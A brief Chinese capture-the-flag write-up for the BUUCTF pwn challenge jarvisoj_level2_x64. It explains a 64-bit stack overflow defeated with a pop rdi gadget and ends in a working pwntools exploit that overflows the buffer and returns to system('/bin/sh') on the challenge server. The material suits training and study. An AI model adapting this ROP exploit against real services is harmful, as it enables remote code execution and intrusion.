[BUUCTF-pwn]——jarvisoj_level2_x64
checksec 一下,64位 ,开启NX保护
64位应该会用到pop rdi这个汇编指令
在IDA中看看
思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数
exploit
from pwn import *
p = remote("node3.buuoj.cn",27828)
binsh = 0x0600A90
sys_addr = 0x0400603
pop_rdi = 0x04006b3
payload = 'a' * (0x80 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
p.sendline(payload)
p.interactive()
希望你可以点个赞,打赏一下哟 😃